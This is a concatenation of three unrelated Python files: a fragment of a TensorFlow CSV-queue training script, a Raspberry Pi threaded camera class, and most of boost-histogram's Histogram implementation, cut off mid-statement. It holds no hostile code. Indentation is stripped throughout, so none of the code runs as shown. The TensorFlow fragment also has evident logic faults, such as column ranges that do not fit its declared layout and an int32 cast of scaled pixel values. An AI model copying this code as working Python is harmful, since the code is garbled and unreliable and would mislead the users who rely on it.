key, value = reader.read(filename_queue)
# Default values, in case of empty columns. Also specifies the type of the
# decoded result.
print("Initialize columns")
columns = [[0] for x in tqdm(range(723))]
#print(columns)
print("Initialize Features")
features = [0 for x in tqdm(range(361))]
#print(features)
columns = tf.decode_csv(value, record_defaults=columns)
#print(columns)
print("Populating features")
features = [columns[x] for x in tqdm(range(361))]
print("Populating solutions")
labels = [columns[x] for x in tqdm(range(362, 723))]
#print(solutions)
trIdx = columns[362]
batch_size = 128
def data_iterator():
""" A simple data iterator """
batch_idx = 0
while True:
        # shuffle labels and features (note: the fancy indexing below assumes
        # `features` and `labels` are NumPy arrays rather than plain Python lists)
idxs = np.arange(0, len(features))
random.shuffle(idxs)
shuf_features = features[idxs]
shuf_labels = labels[idxs]
for batch_idx in range(0, len(features), batch_size):
images_batch = shuf_features[batch_idx:batch_idx + batch_size] / 255.
images_batch = images_batch.astype("int32")
labels_batch = shuf_labels[batch_idx:batch_idx + batch_size]
yield images_batch, labels_batch
class CustomRunner(object):
"""
    This class manages the background threads needed to fill
a queue full of data.
"""
def __init__(self):
self.dataX = tf.placeholder(dtype=tf.float32, shape=[None, 28*28])
self.dataY = tf.placeholder(dtype=tf.int64, shape=[None, ])
# The actual queue of data. The queue contains a vector for
# the mnist features, and a scalar label.
self.queue = tf.RandomShuffleQueue(shapes=[[28*28], []],
dtypes=[tf.float32, tf.int64],
capacity=2000,
min_after_dequeue=1000)
# The symbolic operation to add data to the queue
# we could do some preprocessing here or do it in numpy. In this example
# we do the scaling in numpy
self.enqueue_op = self.queue.enqueue_many([self.dataX, self.dataY])
def get_inputs(self):
"""
        Returns tensors containing a batch of images and labels
"""
images_batch, labels_batch = self.queue.dequeue_many(128)
return images_batch, labels_batch
def thread_main(self, sess):
"""
Function run on alternate thread. Basically, keep adding data to the queue.
"""
for dataX, dataY in data_iterator():
sess.run(self.enqueue_op, feed_dict={self.dataX:dataX, self.dataY:dataY})
def start_threads(self, sess, n_threads=1):
""" Start background threads to feed queue """
threads = []
for n in range(n_threads):
t = threading.Thread(target=self.thread_main, args=(sess,))
t.daemon = True # thread will close when parent quits
t.start()
threads.append(t)
return threads
try:
# Doing anything with data on the CPU is generally a good idea.
with tf.device("/cpu:0"):
custom_runner = CustomRunner()
images_batch, labels_batch = custom_runner.get_inputs()
# simple model
w = tf.get_variable("w1", [28*28, 10])
y_pred = tf.matmul(images_batch, w)
        loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y_pred, labels=labels_batch)
# for monitoring
loss_mean = tf.reduce_mean(loss)
train_op = tf.train.AdamOptimizer().minimize(loss)
sess = tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=8))
init = tf.global_variables_initializer()
sess.run(init)
# start the tensorflow QueueRunner's
tf.train.start_queue_runners(sess=sess)
# start our custom queue runner's threads
custom_runner.start_threads(sess)
count = 0
while True:
_, loss_val = sess.run([train_op, loss_mean])
if (count % 100 == 0):
print(loss_val)
count += 1
except TypeError:
print("TE")
quit()
|
camera.py
|
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
class Camera(object):
def __init__(self, resolution=(512, 304), framerate=24):
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(
self.rawCapture, format="bgr", use_video_port=True)
self.frame = None
self.stopped = False
def start(self):
        # start the frame-reading loop on a background thread
Thread(target=self.update, args=()).start()
return self
def update(self):
        # keep reading frames from the camera stream
for f in self.stream:
self.frame = f.array
self.rawCapture.truncate(0)
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
        # return the most recently captured frame
return self.frame
def stop(self):
        # signal the reader thread to stop
self.stopped = True
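

if __name__ == "__main__":
    # Minimal usage sketch (requires a Raspberry Pi camera; values are illustrative):
    # start the background capture thread, read a few frames, then shut down.
    import time

    cam = Camera().start()
    time.sleep(2)  # give the camera a moment to warm up and deliver a first frame
    for _ in range(5):
        frame = cam.read()  # latest BGR frame as a numpy array, or None if not ready yet
        print(None if frame is None else frame.shape)
        time.sleep(0.5)
    cam.stop()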
|
hist.py
|
import collections.abc
import copy
import logging
import threading
import typing
import warnings
from os import cpu_count
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Iterable,
List,
Mapping,
NewType,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
import numpy as np
import boost_histogram
import boost_histogram._core as _core
from .axestuple import AxesTuple
from .axis import Axis
from .enum import Kind
from .storage import Double, Storage
from .typing import Accumulator, ArrayLike, CppHistogram, SupportsIndex
from .utils import cast, register, set_module
from .view import MeanView, WeightedMeanView, WeightedSumView, _to_view
if TYPE_CHECKING:
from builtins import ellipsis
NOTHING = object()
_histograms: Set[Type[CppHistogram]] = {
_core.hist.any_double,
_core.hist.any_int64,
_core.hist.any_atomic_int64,
_core.hist.any_unlimited,
_core.hist.any_weight,
_core.hist.any_mean,
_core.hist.any_weighted_mean,
}
logger = logging.getLogger(__name__)
CppAxis = NewType("CppAxis", object)
SimpleIndexing = Union[SupportsIndex, slice]
InnerIndexing = Union[SimpleIndexing, Callable[[Axis], int], "ellipsis"]
FullInnerIndexing = Union[InnerIndexing, List[InnerIndexing]]
IndexingWithMapping = Union[FullInnerIndexing, Mapping[int, FullInnerIndexing]]
IndexingExpr = Union[IndexingWithMapping, Tuple[IndexingWithMapping, ...]]
T = TypeVar("T")
def _fill_cast(
value: T, *, inner: bool = False
) -> Union[T, "np.typing.NDArray[Any]", Tuple[T, ...]]:
"""
Convert to NumPy arrays. Some buffer objects do not get converted by forcecast.
If not called by itself (inner=False), then will work through one level of tuple/list.
"""
if value is None or isinstance(value, (str, bytes)):
return value # type: ignore
elif not inner and isinstance(value, (tuple, list)):
return tuple(_fill_cast(a, inner=True) for a in value) # type: ignore
elif hasattr(value, "__iter__") or hasattr(value, "__array__"):
return np.asarray(value)
else:
return value
def _arg_shortcut(item: Union[Tuple[int, float, float], Axis, CppAxis]) -> CppAxis:
if isinstance(item, tuple) and len(item) == 3:
msg = "Developer shortcut: will be removed in a future version"
warnings.warn(msg, FutureWarning)
return _core.axis.regular_uoflow(item[0], item[1], item[2]) # type: ignore
elif isinstance(item, Axis):
return item._ax # type: ignore
else:
raise TypeError("Only axes supported in histogram constructor")
def _expand_ellipsis(indexes: Iterable[Any], rank: int) -> List[Any]:
indexes = list(indexes)
number_ellipses = indexes.count(Ellipsis)
if number_ellipses == 0:
return indexes
elif number_ellipses == 1:
index = indexes.index(Ellipsis)
additional = rank + 1 - len(indexes)
if additional < 0:
raise IndexError("too many indices for histogram")
# Fill out the ellipsis with empty slices
return indexes[:index] + [slice(None)] * additional + indexes[index + 1 :]
else:
raise IndexError("an index can only have a single ellipsis ('...')")
H = TypeVar("H", bound="Histogram")
# We currently do not cast *to* a histogram, but this is consistent
# and could be used later.
@register(_histograms) # type: ignore
@set_module("boost_histogram")
class Histogram:
# Note this is a __slots__ __dict__ class!
__slots__ = (
"_hist",
"axes",
"__dict__",
)
# .metadata and ._variance_known are part of the dict
_family: object = boost_histogram
def __init_subclass__(cls, *, family: Optional[object] = None) -> None:
"""
Sets the family for the histogram. This should be a unique object (such
as the main module of your package) that is consistently set across all
subclasses. When converting back from C++, casting will try to always
pick the best matching family from the loaded subclasses for Axis and
such.
"""
super().__init_subclass__()
cls._family = family if family is not None else object()
@typing.overload
def __init__(self, *args: "Histogram") -> None:
...
@typing.overload
def __init__(self, *args: CppHistogram, metadata: Any = ...) -> None:
...
@typing.overload
def __init__(
self,
*axes: Union[Axis, CppAxis],
storage: Storage = ...,
metadata: Any = ...,
) -> None:
...
def __init__(
self,
*axes: Union[Axis, CppAxis, "Histogram", CppHistogram],
storage: Storage = Double(), # noqa: B008
metadata: Any = None,
) -> None:
"""
Construct a new histogram.
If you pass in a single argument, this will be treated as a
histogram and this will convert the histogram to this type of
histogram.
Parameters
----------
*args : Axis
Provide 1 or more axis instances.
storage : Storage = bh.storage.Double()
Select a storage to use in the histogram
metadata : Any = None
Data that is passed along if a new histogram is created
"""
self._variance_known = True
# Allow construction from a raw histogram object (internal)
if len(axes) == 1 and isinstance(axes[0], tuple(_histograms)):
self._hist: Any = axes[0]
self.metadata = metadata
self.axes = self._generate_axes_()
return
# If we construct with another Histogram as the only positional argument,
# support that too
if len(axes) == 1 and isinstance(axes[0], Histogram):
# Special case - we can recursively call __init__ here
self.__init__(axes[0]._hist) # type: ignore
self._from_histogram_object(axes[0])
return
# Support objects that provide a to_boost method, like Uproot
elif len(axes) == 1 and hasattr(axes[0], "_to_boost_histogram_"):
self.__init__(axes[0]._to_boost_histogram_()) # type: ignore
return
if storage is None:
storage = Double()
self.metadata = metadata
# Check for missed parenthesis or incorrect types
if not isinstance(storage, Storage):
if issubclass(storage, Storage):
raise KeyError(
"Passing in an initialized storage has been removed. Please add ()."
)
else:
raise KeyError("Only storages allowed in storage argument")
# Allow a tuple to represent a regular axis
axes = tuple(_arg_shortcut(arg) for arg in axes) # type: ignore
if len(axes) > _core.hist._axes_limit:
raise IndexError(
f"Too many axes, must be less than {_core.hist._axes_limit}"
)
# Check all available histograms, and if the storage matches, return that one
for h in _histograms:
if isinstance(storage, h._storage_type):
self._hist = h(axes, storage)
self.axes = self._generate_axes_()
return
raise TypeError("Unsupported storage")
def _from_histogram_object(self, other: "Histogram") -> None:
"""
Convert self into a new histogram object based on another, possibly
converting from a different subclass.
"""
self._hist = other._hist
self.__dict__ = copy.copy(other.__dict__)
self.axes = self._generate_axes_()
for ax in self.axes:
ax.__dict__ = copy.copy(ax._ax.metadata)
# Allow custom behavior on either "from" or "to"
other._export_bh_(self)
self._import_bh_()
def _import_bh_(self) -> None:
"""
If any post-processing is needed to pass a histogram between libraries, a
subclass can implement it here. self is the new instance in the current
(converted-to) class.
"""
@classmethod
def _export_bh_(cls, self: "Histogram") -> None:
"""
If any preparation is needed to pass a histogram between libraries, a subclass can
implement it here. cls is the current class being converted from, and self is the
instance in the class being converted to.
"""
def _generate_axes_(self) -> AxesTuple:
"""
This is called to fill in the axes. Subclasses can override it if they need
to change the axes tuple.
"""
return AxesTuple(self._axis(i) for i in range(self.ndim))
def _new_hist(self: H, _hist: CppHistogram, memo: Any = NOTHING) -> H:
"""
Return a new histogram given a new _hist, copying metadata.
"""
other = self.__class__(_hist)
if memo is NOTHING:
other.__dict__ = copy.copy(self.__dict__)
else:
other.__dict__ = copy.deepcopy(self.__dict__, memo)
other.axes = other._generate_axes_()
for ax in other.axes:
if memo is NOTHING:
ax.__dict__ = copy.copy(ax._ax.metadata)
else:
ax.__dict__ = copy.deepcopy(ax._ax.metadata, memo)
return other
@property
def ndim(self) -> int:
"""
Number of axes (dimensions) of the histogram.
"""
return self._hist.rank() # type: ignore
def view(
self, flow: bool = False
) -> Union["np.typing.NDArray[Any]", WeightedSumView, WeightedMeanView, MeanView]:
"""
Return a view into the data, optionally with overflow turned on.
"""
return _to_view(self._hist.view(flow))
def __array__(self) -> "np.typing.NDArray[Any]":
return self.view(False)
def __eq__(self, other: Any) -> bool:
return hasattr(other, "_hist") and self._hist == other._hist
def __ne__(self, other: Any) -> bool:
return (not hasattr(other, "_hist")) or self._hist != other._hist
def __add__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
return result.__iadd__(other)
def __iadd__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
if isinstance(other, (int, float)) and other == 0:
return self
self._compute_inplace_op("__iadd__", other)
# Addition may change the axes if they can grow
self.axes = self._generate_axes_()
return self
def __radd__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self + other
# If these fail, the underlying object throws the correct error
def __mul__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
return result._compute_inplace_op("__imul__", other)
def __rmul__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self * other
def __truediv__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
return result._compute_inplace_op("__itruediv__", other)
def __div__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
result = self.copy(deep=False)
return result._compute_inplace_op("__idiv__", other)
def __idiv__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self._compute_inplace_op("__idiv__", other)
def __itruediv__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self._compute_inplace_op("__itruediv__", other)
def __imul__(
self: H, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
return self._compute_inplace_op("__imul__", other)
def _compute_inplace_op(
self: H, name: str, other: Union["Histogram", "np.typing.NDArray[Any]", float]
) -> H:
# Also takes CppHistogram, but that confuses mypy because it's hard to pick out
if isinstance(other, Histogram):
getattr(self._hist, name)(other._hist)
elif isinstance(other, tuple(_histograms)):
getattr(self._hist, name)(other)
elif hasattr(other, "shape") and other.shape: # type: ignore
assert not isinstance(other, float)
if len(other.shape) != self.ndim:
raise ValueError(
"Number of dimensions {} must match histogram {}".format(
len(other.shape), self.ndim
)
)
elif all(a in {b, 1} for a, b in zip(other.shape, self.shape)):
view = self.view(flow=False)
getattr(view, name)(other)
elif all(a in {b, 1} for a, b in zip(other.shape, self.axes.extent)):
view = self.view(flow=True)
getattr(view, name)(other)
else:
raise ValueError(
"Wrong shape {}, expected {} or {}".format(
other.shape, self.shape, self.axes.extent
)
)
else:
view = self.view(flow=True)
getattr(view, name)(other)
self._variance_known = False
return self
# TODO: Marked as too complex by flake8. Should be factored out a bit.
def fill(
self: H,
*args: Union[ArrayLike, str],
weight: Optional[ArrayLike] = None,
sample: Optional[ArrayLike] = None,
threads: Optional[int] = None,
) -> H: # noqa: C901
"""
Insert data into the histogram.
Parameters
----------
*args : Union[Array[float], Array[int], Array[str], float, int, str]
Provide one value or array per dimension.
weight : List[Union[Array[float], Array[int], float, int, str]]]
Provide weights (only if the histogram storage supports it)
sample : List[Union[Array[float], Array[int], Array[str], float, int, str]]]
Provide samples (only if the histogram storage supports it)
threads : Optional[int]
Fill with threads. Defaults to None, which does not activate
threaded filling. Using 0 will automatically pick the number of
available threads (usually two per core).
"""
if (
self._hist._storage_type
not in {
_core.storage.weight,
_core.storage.mean,
_core.storage.weighted_mean,
}
and weight is not None
):
self._variance_known = False
# Convert to NumPy arrays
args_ars = _fill_cast(args)
weight_ars = _fill_cast(weight)
sample_ars = _fill_cast(sample)
if threads is None or threads == 1:
self._hist.fill(*args_ars, weight=weight_ars, sample=sample_ars)
return self
if threads == 0:
threads = cpu_count()
if self._hist._storage_type in {
_core.storage.mean,
_core.storage.weighted_mean,
}:
raise RuntimeError("Mean histograms do not support threaded filling")
data = [np.array_split(a, threads) for a in args_ars] # type: ignore
if weight is None or np.isscalar(weight):
assert threads is not None
weights = [weight_ars] * threads
else:
weights = np.array_split(weight_ars, threads) # type: ignore
if sample_ars is None or np.isscalar(sample_ars):
assert threads is not None
samples = [sample_ars] * threads
else:
samples = np.array_split(sample_ars, threads) # type: ignore
if self._hist._storage_type is _core.storage.atomic_int64:
def fun(
weight: Optional[ArrayLike],
sample: Optional[ArrayLike],
*args: "np.typing.NDArray[Any]",
) -> None:
self._hist.fill(*args, weight=weight, sample=sample)
else:
sum_lock = threading.Lock()
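# For non-atomic storages each worker fills a private copy of the histogram
# and the copies are merged under this lock, so concurrent fills never touch
# the shared buffers directly.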
def fun(
weight: Optional[ArrayLike],
sample: Optional[ArrayLike],
*args: "np.typing.NDArray[Any]",
) -> None:
local_hist = self._hist.__copy__()
local_hist.reset()
local_hist.fill(*args, weight=weight, sample=sample)
with sum_lock:
self._hist += local_hist
thread_list = [
threading.Thread(target=fun, args=arrays)
for arrays in zip(weights, samples, *data)
]
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
return self
def __str__(self) -> str:
"""
A rendering of the histogram is made using ASCII or unicode characters
(whatever is supported by the terminal). What exactly is displayed is
still experimental. Do not rely on any particular rendering.
"""
# TODO check the terminal width and adjust the presentation
# only use for 1D, fall back to repr for ND
if self._hist.rank() != 1:
return repr(self)
s = str(self._hist)
# get rid of first line and last character
return s[s.index("\n") + 1 : -1]
def _axis(self, i: int = 0) -> Axis:
"""
Get N-th axis.
"""
return cast(self, self._hist.axis(i), Axis)
@property
def _storage_type(self) -> Type[Storage]:
return cast(self, self._hist._storage_type, Storage) # type: ignore
def _reduce(self: H, *args: Any) -> H:
return self._new_hist(self._hist.reduce(*args))
def __copy__(self: H) -> H:
return self._new_hist(copy.copy(self._hist))
def __deepcopy__(self: H, memo: Any) -> H:
return self._new_hist(copy.deepcopy(self._hist), memo=memo)
def __getstate__(self) -> Tuple[int, Dict[str, Any]]:
"""
Version 0.8: metadata added
Version 0.11: version added and set to 0. metadata/_hist replaced with dict.
Version 0.12: _variance_known is now in the dict (no format change)
``dict`` contains __dict__ with added "_hist"
"""
local_dict = copy.copy(self.__dict__)
local_dict["_hist"] = self._hist
# Version 0 of boost-histogram pickle state
return (0, local_dict)
def __setstate__(self, state: Any) -> None:
if isinstance(state, tuple):
if state[0] == 0:
for key, value in state[1].items():
setattr(self, key, value)
# Added in 0.12
if "_variance_known" not in state[1]:
self._variance_known = True
else:
msg = f"Cannot open boost-histogram pickle v{state[0]}"
raise RuntimeError(msg)
else: # Classic (0.10 and before) state
self._hist = state["_hist"]
self._variance_known = True
self.metadata = state.get("metadata", None)
for i in range(self._hist.rank()):
self._hist.axis(i).metadata = {"metadata": self._hist.axis(i).metadata}
self.axes = self._generate_axes_()
def __repr__(self) -> str:
newline = "\n "
sep = "," if len(self.axes) > 0 else ""
ret = "{self.__class__.__name__}({newline}".format(
self=self, newline=newline if len(self.axes) > 1 else ""
)
ret += f",{newline}".join(repr(ax) for ax in self.axes)
ret += "{comma}{newline}storage={storage}".format(
storage=self._storage_type(),
newline=newline
if len(self.axes) > 1
else " "
if len(self.axes) > 0
else "",
comma=sep,
)
ret += ")"
outer = self.sum(flow=True)
if outer:
inner = self.sum(flow=False)
ret += f" # Sum: {inner}"
if inner != outer:
ret += f" ({outer} with flow)"
return ret
def _compute_uhi_index(self, index: InnerIndexing, axis: int) -> SimpleIndexing:
"""
Converts an expression that contains UHI locators to one that does not.
"""
# Support sum and rebin directly
if index is sum or hasattr(index, "factor"): # type: ignore
index = slice(None, None, index)
# General locators
# Note that MyPy doesn't like these very much - the fix
# will be to properly set input types
elif callable(index):
index = index(self.axes[axis])
elif isinstance(index, SupportsIndex):
if abs(int(index)) >= self._hist.axis(axis).size:
raise IndexError("histogram index is out of range")
index %= self._hist.axis(axis).size
return index # type: ignore
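# Illustrative UHI indexing handled by this helper (added example, not from the
# original source; assumes the boost-histogram tag objects loc/rebin are in scope):
#   h[loc(2.5)]     # the bin containing the value 2.5
#   h[sum]          # sum over the whole axis, including flow
#   h[::rebin(2)]   # merge adjacent bins by a factor of 2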
def _compute_commonindex(
self, index: IndexingExpr
) -> List[Union[SupportsIndex, slice, Mapping[int, Union[SupportsIndex, slice]]]]:
"""
Takes indices and returns two iterables; one is a tuple or dict of the
original, Ellipsis expanded index, and the other returns index,
operation value pairs.
"""
indexes: List[Any]
# Shorten the computations with direct access to raw object
hist = self._hist
# Support dict access
if hasattr(index, "items"):
indexes = [slice(None)] * hist.rank()
for k, v in index.items(): # type: ignore
indexes[k] = v
# Normalize -> h[i] == h[i,]
else:
if not isinstance(index, tuple):
index = (index,)
# Now a list
indexes = _expand_ellipsis(index, hist.rank())
if len(indexes) != hist.rank():
raise IndexError("Wrong number of indices for histogram")
# Allow [bh.loc(...)] to work
for i in range(len(indexes)):
# Support list of UHI indexers
if isinstance(indexes[i], list):
indexes[i] = [self._compute_uhi_index(index, i) for index in indexes[i]]
else:
indexes[i] = self._compute_uhi_index(indexes[i], i)
return indexes
def to_numpy(
self, flow: bool = False, *, dd: bool = False, view: bool = False
) -> Union[
Tuple["np.typing.NDArray[Any]", ...],
Tuple["np.typing.NDArray[Any]", Tuple["np.typing.NDArray[Any]", ...]],
]:
"""
Convert to a NumPy style tuple of return arrays. Edges are converted to
match NumPy standards, with upper edge inclusive, unlike
boost-histogram, where upper edge is exclusive.
Parameters
----------
flow : bool = False
Include the flow bins.
dd : bool = False
Use the histogramdd return syntax, where the edges are in a tuple.
Otherwise, this is the histogram/histogram2d return style.
view : bool = False
The behavior for the return value. By default, this will return
array of the values only regardless of the storage (which is all
NumPy's histogram function can do). view=True will return the
boost-histogram view of the storage.
Return
------
contents : Array[Any]
The bin contents
*edges : Array[float]
The edges for each dimension
"""
hist, *edges = self._hist.to_numpy(flow)
hist = self.view(flow=flow) if view else self.values(flow=flow)
if dd:
return (hist, tuple(edges))
else:
return (hist, *edges)
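# Illustrative use for a 1D histogram (added example, not from the original source):
#   counts, xedges = h.to_numpy()             # histogram-style return
#   counts, (xedges,) = h.to_numpy(dd=True)   # histogramdd-style return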
def copy(self: H, *, deep: bool = True) -> H:
"""
Make a copy of the histogram. Defaults to making a
deep copy (axis metadata copied); use deep=False
to avoid making a copy of axis metadata.
"""
if deep:
return copy.deepcopy(self)
else:
return copy.copy(self)
def reset(self: H) -> H:
"""
Reset bin counters to default values.
"""
self._hist.reset()
return self
def empty(self, flow: bool = False) -> bool:
"""
Check to see if the histogram has any non-default values.
You can use flow=True to check flow bins too.
"""
return self._hist.empty(flow) # type: ignore
def sum(self, flow: bool = False) -> Union[float, Accumulator]:
"""
Compute the sum over the histogram bins (optionally including the flow bins).
"""
return self._hist.sum(flow) # type: ignore
@property
def size(self) -> int:
"""
Total number of bins in the histogram (including underflow/overflow).
"""
return self._hist.size() # type: ignore
@property
def shape(self) -> Tuple[int, ...]:
"""
Tuple of axis sizes (not including underflow/overflow).
"""
return self.axes.size
# TODO: Marked as too complex by flake8. Should be factored out a bit.
def __getitem__( # noqa: C901
self: H, index: IndexingExpr
) -> Union[H, float, Accumulator]:
indexes = self._compute_commonindex(index)
# If this is (now) all integers, return the bin contents
# But don't try *dict!
if not hasattr(indexes, "items"):
try:
return self._hist.at(*indexes) # type: ignore
except RuntimeError:
pass
integrations: Set[int] = set()
slices: List[_core.algorithm.reduce_command] = []
pick_each: Dict[int, int] = dict()
pick_set: Dict[int, List[int]] = dict()
# Compute needed slices and projections
for i, ind in enumerate(indexes):
if hasattr(ind, "__index__"):
pick_each[i] = ind.__index__() + ( # type: ignore
1 if self.axes[i].traits.underflow else 0
)
continue
elif isinstance(ind, collections.abc.Sequence):
pick_set[i] = list(ind)
continue
elif not isinstance(ind, slice):
raise IndexError(
"Must be a slice, an integer, or follow the locator protocol."
)
# If the dictionary brackets are forgotten, it's easy to put a slice
# into a slice - adding a nicer error message in that case
if any(isinstance(v, slice) for v in (ind.start, ind.stop, ind.step)):
raise TypeError(
"You have put a slice in a slice. Did you forget curly braces [{...}]?"
)
# This ensures that callable start/stop are handled
start, stop = self.axes[i]._process_loc(ind.start, ind.stop)
if ind != slice(None):
merge = 1
if ind.step is not None:
if hasattr(ind.step, "factor"):
merge = ind.step.factor
elif callable(ind.step):
if ind.step is sum:
integrations.add(i)
else:
raise RuntimeError("Full UHI not supported yet")
if ind.start is not None or ind.stop is not None:
slices.append(
_core.algorithm.slice(
i, start, stop, _core.algorithm.slice_mode.crop
)
)
continue
else:
raise IndexError(
"The third argument to a slice must be rebin or projection"
)
assert isinstance(start, int)
assert isinstance(stop, int)
slices.append(_core.algorithm.slice_and_rebin(i, start, stop, merge))
logger.debug("Reduce with %s", slices)
reduced = self._hist.reduce(*slices)
if pick_set:
warnings.warn(
"List indexing selection is experimental. Removed bins are not placed in overflow."
)
logger.debug("Slices for picking sets: %s", pick_set)
axes = [reduced.axis(i) for i in range(reduced.rank())]
reduced_view = reduced.view(flow=True)
for i in pick_set:
selection = copy.copy(pick_set[i])
ax = reduced.axis(i)
if ax.traits_ordered:
raise RuntimeError(
f"Axis {i} is not a categorical axis, cannot pick with list"
)
if ax.traits_overflow and ax.size not in pick_set[i]:
selection.append(ax.size)
new_axis = axes[i].__class__([axes[i].value(j) for j in pick_set[i]])
new_axis.metadata = axes[i].metadata
axes[i] = new_axis
reduced_view = np.take(reduced_view, selection, axis=i)
logger.debug("Axes: %s", axes)
new_reduced = reduced.__class__(axes)
new_reduced.view(flow=True)[...] = reduced_view
reduced = new_reduced
if pick_each:
tuple_slice = tuple(
pick_each.get(i, slice(None)) for i in range(reduced.rank())
)
logger.debug("Slices for pick each: %s", tuple_slice)
axes = [
reduced.axis(i) for i in range(reduced.rank()) if i not in pick_each
]
logger.debug("Axes: %s", axes)
new_reduced = reduced.__class__(axes)
new_reduced.view(flow=True)[...] = reduced.view(flow=True)[tuple_slice]
reduced = new_reduced
integrations = {i - sum(j <= i for j in pick_each) for i in integrations}
if integrations:
projections = [i for i in range(reduced.rank()) if i not in integrations]
reduced = reduced.project(*projections)
return self._new_hist(reduced) if reduced.rank() > 0 else reduced.sum(flow=True)
def __setitem__(
self, index: IndexingExpr, value: Union[ArrayLike, Accumulator]
) -> None:
"""
There are several supported possibilities:
h[slice] = array # same size
If an array is given to a compatible slice, it is set.
h[a:] = array # One larger
If an array is given that does not match, if it does match the
with-overflow size, it fills that.
PLANNED (not yet supported):
h[a:] = h2
If another histogram is given, that must either match with or without
overflow, where the overflow bins must be overflow bins (that is,
you cannot set a histogram's flow bins from another histogram that
is 2 larger). Bin edges must be a close match, as well. If you don't
want this level of type safety, just use ``h[...] = h2.view()``.
"""
indexes = self._compute_commonindex(index)
if isinstance(value, Histogram):
raise TypeError("Not supported yet")
value = np.asarray(value)
view = self.view(flow=True)
# Support raw arrays for accumulators, the final dimension is the constructor values
if (
value.ndim > 0
and len(view.dtype) > 0 # type: ignore
and len(value.dtype) == 0
and len(view.dtype) == value.shape[-1] # type: ignore
):
value_shape = value.shape[:-1]
value_ndim = value.ndim - 1
else:
value_shape = value.shape
value_ndim = value.ndim
# NumPy does not broadcast partial slices, but we would need
# to allow it (because we do allow broadcasting up dimensions)
# Instead, we simply require matching dimensions.
if value_ndim > 0 and value_ndim != sum(isinstance(i, slice) for i in indexes):
raise ValueError(
"Setting a {}D histogram with a {}D array must have a matching number of dimensions".format(
len(indexes), value_ndim
)
)
# Here, value_n does not increment with n if this is not a slice
value_n = 0
for n, request in enumerate(indexes):
has_underflow = self.axes[n].traits.underflow
has_overflow = self.axes[n].traits.overflow
if isinstance(request, slice):
# Only consider underflow/overflow if the endpoints are not given
use_underflow = has_underflow and request.start is None
use_overflow = has_overflow and request.stop is None
# Make the limits explicit since we may need to shift them
start = 0 if request.start is None else request.start
stop = len(self.axes[n]) if request.stop is None else request.stop
request_len = stop - start
# If set to a scalar, then treat it like broadcasting without flow bins
if value_ndim == 0:
start = 0 + has_underflow
stop = len(self.axes[n]) + has_underflow
# Normal setting
elif request_len == value_shape[value_n]:
start += has_underflow
stop += has_underflow
# Expanded setting
elif request_len + use_underflow + use_overflow == value_shape[value_n]:
start += has_underflow and not use_underflow
stop += has_underflow + (has_overflow and use_overflow)
# Single element broadcasting
elif value_shape[value_n] == 1:
start += has_underflow
stop += has_underflow
else:
msg = f"Mismatched shapes in dimension {n}"
msg += f", {value_shape[value_n]} != {request_len}"
if use_underflow or use_overflow:
msg += " or {}".format(
request_len + use_underflow + use_overflow
)
raise ValueError(msg)
indexes[n] = slice(start, stop, request.step)
value_n += 1
else:
indexes[n] = request + has_underflow
view[tuple(indexes)] = value # type: ignore
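# Illustrative use for a 1D histogram with 10 bins and default flow bins
# (added example, not from the original source):
#   h[:] = np.arange(10)   # sets the regular bins only
#   h[:] = np.arange(12)   # also sets the underflow and overflow bins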
def project(self: H, *args: int) -> Union[H, float, Accumulator]:
"""
Project to a single axis or several axes on a multidimensional histogram.
Provided a list of axis numbers, this will produce the histogram over
those axes only. Flow bins are used if available.
"""
return self._new_hist(self._hist.project(*args))
# Implementation of PlottableHistogram
@property
def kind(self) -> Kind:
"""
Returns Kind.COUNT if this is a normal summing histogram, and Kind.MEAN if this is a
mean histogram.
:return: Kind
"""
if self._hist._storage_type in {
_core.storage.mean,
_core.storage.weighted_mean,
}:
return Kind.MEAN
else:
return Kind.COUNT
def values(self, flow: bool = False) -> "np.typing.NDArray[Any]":
"""
Returns the accumulated values. The counts for simple histograms, the
sum of weights for weighted histograms, the mean for profiles, etc.
If counts is equal to 0, the value in that cell is undefined if
kind == "MEAN".
:param flow: Enable flow bins. Not part of PlottableHistogram, but
included for consistency with other methods and flexibility.
:return: "np.typing.NDArray[Any]"[np.float64]
"""
view = self.view(flow)
# TODO: Might be a NumPy typing bug
if len(view.dtype) == 0: # type: ignore
return view
else:
return view.value # type: ignore
def variances(self, flow: bool = False) -> Optional["np.typing.NDArray[Any]"]:
"""
Returns the estimated variance of the accumulated values. The sum of squared
weights for weighted histograms, the variance of samples for profiles, etc.
For an unweighted histogram where kind == "COUNT", this should return the same
as values if the histogram was not filled with weights, and None otherwise.
If counts is equal to 1 or less, the variance in that cell is undefined if
kind == "MEAN". This must be written <= 1, and not < 2; when these are
effective counts (weighted mean), the counts can fall between 1 and 2,
and the variance is still defined there.
If kind == "MEAN", the counts can be used to compute the error on the mean
as sqrt(variances / counts), this works whether or not the entries are
weighted if the weight variance was tracked by the implementation.
Currently, this always returns an array - but in the future, it will return
None if a weighted fill is made on an unweighted storage.
:param flow: Enable flow bins. Not part of PlottableHistogram, but
included for consistency with other methods and flexibility.
:return: "np.typing.NDArray[Any]"[np.float64]
"""
view = self.view(flow)
if len(view.dtype) == 0: # type: ignore
if self._variance_known:
return view
else:
return None
elif hasattr(view, "sum_of_weights"):
return np.divide( # type: ignore
view.variance, # type: ignore
